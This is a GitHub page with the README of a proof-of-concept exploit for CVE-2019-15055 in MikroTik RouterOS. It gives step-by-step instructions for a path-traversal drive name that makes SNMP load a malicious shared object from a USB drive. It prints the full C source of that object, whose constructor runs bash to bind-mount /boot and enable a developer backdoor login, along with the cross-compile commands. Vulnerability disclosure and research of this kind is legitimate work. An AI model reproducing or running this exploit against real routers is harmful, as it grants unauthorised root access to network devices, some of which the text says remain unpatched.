Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
routeros/poc/cve_2019_15055/
routeros/poc/cve_2019_15055/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2019-15055

This vulnerability requires a USB or drive be mounted and visible in System -> Disk. Assuming you have control of the USB create the directory structure "/nova/lib/snmp/" and store lol_mips.so in the snmp subdirectory. Note that the shared object is compiled as mips big endian. If your target uses a different architecture than you'll need to recompile it.

Next change the drive's name to "../../../ram/pckg/snmp_xploit" and enable (or restart) the SNMP process. This should cause SNMP to load the shared object on the USB. The shared object simply does the following:

albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ cat snmp_exec.c 
#include <unistd.h>
#include <stdlib.h>

void __attribute__((constructor)) lol(void)
{
    int fork_result = fork();
    if (fork_result == 0)
    {
        execl("/bin/bash", "bash", "-c", "mkdir /pckg/option; mount -o bind /boot/ /pckg/option", (char *) 0);
        exit(0);
    }
}

extern void autorun(void)
{
    // do nothin' I guess?
    return; 
}

So you should now be able to login to through the devel backdoor.

Affected versions

At the time of commit, this has been fixed in 6.46rc34 and 6.45.5. Long-term still has no fix.

Compiling the shared object

albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -c -fpic snmp_exec.c
albinolobster@ubuntu:~/routeros/poc/cve_2019_15055/shared_obj$ ~/cross-compiler-mips/bin/mips-gcc -shared -s -o lol_mips.so snmp_exec.o